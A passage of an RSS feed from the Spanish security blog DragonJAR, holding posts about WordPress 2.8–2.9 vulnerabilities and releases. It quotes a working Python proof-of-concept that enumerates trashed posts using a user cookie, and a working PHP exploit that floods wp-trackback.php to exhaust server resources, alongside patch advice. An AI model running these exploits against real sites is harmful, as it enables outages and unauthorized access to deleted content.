<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; WordPress</title>
	<atom:link href="http://www.dragonjar.org/tag/wordpress/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Sat, 13 Mar 2010 18:53:07 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Pueden leer tu &#8220;Basura&#8221;</title>
		<link>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml</link>
		<comments>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml#comments</comments>
		<pubDate>Mon, 15 Feb 2010 07:33:25 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Informacion]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3856</guid>
		<description><![CDATA[Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.

Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;papelera&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Un nuevo fallo en el famoso WordPress, descubierto por el investigador <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.</p>
<p style="text-align: center;"><img class="alignnone" title="Fallo en WordPress" src="http://img59.imageshack.us/img59/5996/wordpresstrash300x300.png" alt="wordpresstrash300x300 Pueden leer tu Basura" width="300" height="300" /></p>
<p style="text-align: justify;">Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;<a rel="nofollow" target="_blank" href="http://www.youtube.com/watch?v=dFlBm2XGv4g">papelera</a>&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a la &#8220;papelera de reciclaje&#8221; para prevenir así que sean eliminados de forma accidental.</p>
<p style="text-align: justify;">Lo que descubrió <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la &#8220;papelera&#8221;, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos&#8230; cosa que <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Mackenzie</a> pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra &#8220;papelera&#8221;.<span id="more-3856"></span></p>
<blockquote><p>#/usr/bin/python<br />
#<br />
# WordPress &gt; 2.9 Failure to Restrict URL Access PoC<br />
#<br />
# This script iterates through the WP post ID&#8217;s as an authenticated and unauthenticated user.<br />
# If the requests differ a &#8216;Trash&#8217; post has been found.<br />
#<br />
# You will need an authenticated user cookie of any priveledge to run this script.<br />
#<br />
# Example cookie:<br />
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8<br />
#<br />
# Will only work with WP URLs with the &#8216;/?p={int}&#8217; parameter. Would need to handle redirects (3xx) to handle all URL types.<br />
#<br />
#<br />
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)</p>
<p>import httplib</p>
<p># Declare vars<br />
blogURL = &#8220;www.example.com&#8221;<br />
userCookie = &#8220;enter_cookie_here&#8221;<br />
postID = 0 #Leave at 0</p>
<p>conn = httplib.HTTPConnection(blogURL)<br />
Headers = {&#8220;Cookie&#8221; : userCookie}</p>
<p>print<br />
print &#8220;Target = http://&#8221; + blogURL + &#8220;/?p=&#8221; + str(postID)<br />
print</p>
<p>while 1:</p>
<p># Start non authenticated enumeration</p>
<p>request = &#8216;/?p=&#8217; + str(postID)<br />
conn.request(&#8220;GET&#8221;, request, &#8220;&#8221;)</p>
<p>try:<br />
r1 = conn.getresponse()<br />
except:<br />
print &#8220;Connection error&#8221;</p>
<p>data1 = r1.read()</p>
<p># Start authenticated enumeration</p>
<p>conn.request(&#8220;GET&#8221;, request, None, Headers)</p>
<p>try:<br />
r2 = conn.getresponse()<br />
except:<br />
print &#8220;Connection error&#8221;</p>
<p>data2 = r2.read()</p>
<p># Compare the HTML body reponses</p>
<p>if data1 != data2:<br />
print &#8220;+ Found! http://&#8221; + blogURL + request<br />
else:<br />
print request</p>
<p>postID += 1</p>
<p>conn.close()</p></blockquote>
<p style="text-align: justify;">Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que <a rel="nofollow" target="_blank" href="http://wordpress.org/download/">actualicen su instalación de WordPress a la versión 2.9.2</a> que ya cuenta con un parche para este problema de seguridad.</p>
<p style="text-align: justify;">Una vez más queda confirmado que la seguridad por &#8220;oscuridad&#8221;  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.</p>
<p style="text-align: justify;"><strong>PD.</strong> Lo que no entiendo es por que páginas como <a rel="nofollow" target="_blank" href="http://www.daboweb.com/2010/02/16/wordpress-2-9-2-disponible/">DaboWeb</a> y <a rel="nofollow" target="_blank" href="http://mangasverdes.es/2010/02/15/wordpress-2-9-2-nueva-actualizacion-urgente/">Mangas Verdes</a> hablan de este fallo y afirman que un posible atacante puede &#8220;Eliminar artículos de nuestro WordPress&#8221; ¿De donde habrán sacado esa informacion?&#8230;</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/memorias-del-disi-2009.xhtml" title="Memorias del DISI 2009">Memorias del DISI 2009</a></li><li><a href="http://www.dragonjar.org/el-atacante-informatico-capitulo-2.xhtml" title="El Atacante Informático – Capítulo 2">El Atacante Informático – Capítulo 2</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Nueva versíon de WordPress 2.9</title>
		<link>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml</link>
		<comments>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml#comments</comments>
		<pubDate>Fri, 18 Dec 2009 05:03:28 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Actualizar]]></category>
		<category><![CDATA[Version]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3503</guid>
		<description><![CDATA[La nueva versión de WordPress, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes:


Editor de Imágenes Online: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar y [...]]]></description>
			<content:encoded><![CDATA[<p>La nueva versión de WordPress, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes:</p>
<p style="text-align: center;"><img class="alignnone" title="Wordpress 2.9" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="4031483944 c613aa6089 o Nueva versíon de WordPress 2.9" width="300" height="300" /></p>
<ul>
<li><strong>Editor de Imágenes Online</strong>: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar y rotar, funciones que hace mucho hacían falta</li>
<li><strong>Papelera</strong>: En esta nueva versión WordPress incorpora un sistema de papelera para nuestros post y comentarios borrados, para activarla debemos agregar la siguiente linea <em>define( &#8216;EMPTY_TRASH_DAYS&#8217;, 30 );</em> en nuestro <em>wp-config.php</em> donde 30 son los días a guardar los post y comentarios en la papelera.<span id="more-3503"></span></li>
<li><strong>Incrustación de multimedia</strong>: ya no hará falta el código embed, simplemente poniendo la URL mostrará el contenido, los sistemas soportados son: YouTube, Daily Motion, Blip.tv, Flickr, Hulu, Viddler, Qik, Revision3, Scribd, Google Video, Photobucket, PollDaddy, y WordPress.tv.</li>
<li><strong>Gestión de Multimedia</strong>: El gestor de contenidos multimedia se ha vuelto a escribir desde 0, para mejorar sus funcionalidades.</li>
<li><strong>Sistema de Actualización</strong>: Ahora es posible actualizar los plugins masivamente.</li>
<li><strong>Reparación de base de datos</strong>: Una nueva utilidad integrada en el sistema nos permite realizar una reparación de nuestra base de datos en caso de que tenga errores, para esto solo necesitamos añadir en el archivo  <em>wp-config.php</em> esta línea:  <em>define(’WP_ALLOW_REPAIR’, true);</em>. Después de reparada la tabla, la eliminamos.</li>
<li><strong>Seguridad</strong>: Se han mejorado múltiples aspectos en la seguridad de WordPress y <a rel="nofollow" target="_blank" href="http://core.trac.wordpress.org/query?status=closed&amp;milestone=2.9">reparados mas de 500 errores reportados</a>, esperemos que esta versión sea estable en cuanto a seguridad y no tengan que sacar nuevas versiones solo para corregir problemas de seguridad.</li>
</ul>
<p>La anterior lista son solo algunas de las nuevas funcionalidades de WordPress, si quieres ver todos los cambios<a rel="nofollow" target="_blank" href="http://codex.wordpress.org/Version_2.9"> de esta versión 2.9 ingresa a este enlace</a>.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://wordpress.org/download/">Descargar WordPress 2.9</a></h2>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://codex.wordpress.org/Version_2.9">Codex Versión 2.9</a><br />
<a rel="nofollow" target="_blank" href="http://wordpress.org/development/2009/12/wordpress-2-9/">WordPress 2.9, oh so fine</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml" title="Actualiza a WordPress 2.7.1">Actualiza a WordPress 2.7.1</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li><li><a href="http://www.dragonjar.org/detecta-la-version-de-una-aplicacion-web.xhtml" title="WAFP &#8211; Detecta la Versión de una Aplicación Web">WAFP &#8211; Detecta la Versión de una Aplicación Web</a></li><li><a href="http://www.dragonjar.org/metasploit-framework.xhtml" title="Metasploit Framework 3.3.2">Metasploit Framework 3.3.2</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>XSS que permite postear a atacante registrado en WordPress</title>
		<link>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml</link>
		<comments>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml#comments</comments>
		<pubDate>Thu, 12 Nov 2009 07:56:06 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3341</guid>
		<description><![CDATA[Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra [...]]]></description>
			<content:encoded><![CDATA[<p>Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web  Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra pagina.</p>
<p style="text-align: center;"><img title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="WordPress" /></p>
<p><span id="more-3341"></span>El segundo problema <a rel="nofollow" target="_blank" href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/">no es explicado claramente en el comunicado oficial de WordPress</a>, solo nos comentan que el error se  encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.</p>
<p>Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o <a rel="nofollow" target="_blank" href="http://wordpress.org/">descargando la ultima version desde su pagina oficia</a>,  para asegurarse de que tiene la mejor protección disponible.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</title>
		<link>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml</link>
		<comments>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml#comments</comments>
		<pubDate>Wed, 21 Oct 2009 07:08:09 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Actualizar]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3267</guid>
		<description><![CDATA[Desde hace unos meses los desarrolladores de wordpress están trabajando en lo que seria la versión 2.9 del famoso administrador de contenidos, pero debido a los eventos recientes relacionados con la seguridad en wordpress se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de [...]]]></description>
			<content:encoded><![CDATA[<p>Desde hace unos meses los desarrolladores de wordpress están trabajando en lo que seria la versión 2.9 del famoso administrador de contenidos, pero debido a los eventos recientes relacionados con la seguridad en wordpress se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de corregir y prevenir problemas de seguridad futuros.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://farm3.static.flickr.com/2614/4031483944_c613aa6089_o.jpg" alt="WordPress" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5" /></p>
<p>Por esta razón publican una nueva version de WordPress 2.8.5 en la que todos los cambios realizados son relacionados con la seguridad:<span id="more-3267"></span></p>
<ul>
<li> Arreglaron el error del archivo wp-trackback.php que permitía una<a rel="nofollow" target="_blank" title="Enlace permanente a Denegacion de Servicio en WordPress" rel="bookmark" href="../dos-en-wordpress.xhtml"> Denegacion de Servicio en WordPress </a></li>
<li>Realizaron una re validación de variables para que errores como los del trackback no ocurran de nuevo.</li>
<li>Se realizó un cambiado en el archivo que permite subir a la lista blanca  todos los usuarios, incluidos los Administradores.</li>
<li>Eliminados 2 importadores de etiquetas para plugins viejos.</li>
</ul>
<p>Es recomendable que se se actualicen a esta nueva versión de WordPress para asegurarse de que tiene la mejor protección disponible.</p>
<p>En el <a rel="nofollow" target="_blank" href="http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/">anuncio realizado por Peter Westwood</a> se recomienda la utilización del plugin <a rel="nofollow" target="_blank" href="http://wordpress.org/extend/plugins/exploit-scanner/">WordPress Exploit Scanner</a>, para buscar código sospechoso en la base de datos de los post y comentarios, mas informacion sobre este plugin en su pagina oficial.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a href="http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml" title="Nueva versíon de WordPress 2.9">Nueva versíon de WordPress 2.9</a></li><li><a href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/desbloquea-o-actualiza-el-iphone-os-3-0.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch</a></li><li><a href="http://www.dragonjar.org/actualiza-a-wordpress-271.xhtml" title="Actualiza a WordPress 2.7.1">Actualiza a WordPress 2.7.1</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Denegacion de Servicio en WordPress</title>
		<link>http://www.dragonjar.org/dos-en-wordpress.xhtml</link>
		<comments>http://www.dragonjar.org/dos-en-wordpress.xhtml#comments</comments>
		<pubDate>Sun, 18 Oct 2009 21:26:41 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Vulnerable]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3246</guid>
		<description><![CDATA[Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio.

El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable [...]]]></description>
			<content:encoded><![CDATA[<p><a rel="nofollow" target="_blank" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Jose Carlos Norte</a> acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio.</p>
<p style="text-align: center;"><img class="alignnone" title="Denegacion de Servicio Wordpress" src="http://farm3.static.flickr.com/2715/4027319134_4ef81cac76_o.jpg" alt="4027319134 4ef81cac76 o Denegacion de Servicio en WordPress" width="256" height="222" /></p>
<p>El bug se encuentra en el archivo <strong>wp-trackback.php</strong> quien no valida adecuadamente la variable <strong>$charset</strong>, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.<span id="more-3246"></span></p>
<p>Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress <a rel="nofollow" target="_blank" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">tampoco lo soluciona</a>), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con <strong>mod_security</strong>, no seria vulnerable ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro <strong>php_memory_limit</strong> del <strong>php.ini</strong> para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para Wordpress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress <a rel="nofollow" target="_blank" title="Enlace permanente a Wordpress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">Wordpress Security Whitepaper</a>) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.</p>
<p>Les dejo la solución propuesta por Jose Carlos en su blog para este problema:</p>
<blockquote><p><code>Reemplazar en la linea 45 del archivo wp-trackback.php esto<br />
<strong>$charset = $_POST['charset'];</strong></code></p>
<p>por esto<br />
<strong>$charset =</strong> str_replace(”,”,”&#8221;,<strong>$_POST['charset']</strong>)<strong>;<br />
</strong>if(is_array($charset)) { exit; }</p></blockquote>
<p>Y el exploit para verificar que somos vulnerables:</p>
<blockquote><p><code>&lt;?php<br />
//wordpress Resource exhaustion Exploit<br />
//http://rooibo.wordpress.com/<br />
//security@wordpress.org contacted and get a response,<br />
//but no solution available.<br />
if(count($argv) &lt; 2) {<br />
echo “You need to specify a url to attack\n”;<br />
exit;<br />
}</code></p>
<p>$url = $argv[1];</p>
<p>$data = parse_url($url);<br />
if(count($data) &lt; 2) {     echo “The url should have http:// in front of it, and should be complete.\n”;     exit;     }     if(count($data) == 2) {     $path = ”;     } else {     $path = $data['path'];     }     $path = trim($path,’/&#8217;);     $path .= ‘/wp-trackback.php’;     if($path{0} != ‘/’) {     $path = ‘/’.$path;     }     $b = “”;     $b = str_pad($b,140000,’ABCEDFG’);     $b = utf8_encode($b);     $charset = “”;     $charset = str_pad($charset,140000,”UTF-8,”);     $str = ‘charset=’.urlencode($charset);     $str .= ‘&amp;url=www.example.com’;     $str .= ‘&amp;title=’.$b;     $str .= ‘&amp;blog_name=lol’;     $str .= ‘&amp;excerpt=lol’;     $count = 0;     while(1) {     $fp = @fsockopen($data['host'],80);     if(!$fp) {     if($count &gt; 0) {<br />
echo “down!!!!\n”;<br />
exit;<br />
}<br />
echo “unable to connect to: “.$data['host'].”\n”;<br />
exit;<br />
}</p>
<p>fputs($fp, “POST $path HTTP/1.1\r\n”);<br />
fputs($fp, “Host: “.$data['host'].”\r\n”);<br />
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);<br />
fputs($fp, “Content-length: “.strlen($str).”\r\n”);<br />
fputs($fp, “Connection: close\r\n\r\n”);<br />
fputs($fp, $str.”\r\n\r\n”);</p>
<p>echo “hit!\n”;<br />
$count++;<br />
}</p>
<p>?&gt;</p></blockquote>
<p><strong>Para mas informacion:</strong><br />
<a rel="nofollow" target="_blank" title="Enlace Permanente a &quot;Agujero de seguridad muy grave en WordPress&quot;" rel="bookmark" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Agujero de seguridad muy grave en WordPress</a><br />
<a rel="nofollow" target="_blank" id="thread_title_8527" href="http://comunidad.dragonjar.org/f150/atencion-bug-wordpress-8527/">Atención! BUG Wordpress</a><br />
<a rel="nofollow" target="_blank" title="Enlace permanente a Wordpress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">Wordpress Security Whitepaper </a></p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 996px; width: 1px; height: 1px;">$charset = $_POST['charset'];</div>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml" title="Charla de Seguridad Web Gratuita &#8211; Barcelona España ">Charla de Seguridad Web Gratuita &#8211; Barcelona España </a></li><li><a href="http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml" title="2 Problemas graves que se solucionan en WordPress 2.6.2">2 Problemas graves que se solucionan en WordPress 2.6.2</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/dos-en-wordpress.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Reseteo Remoto del Password de Admin en WordPress</title>
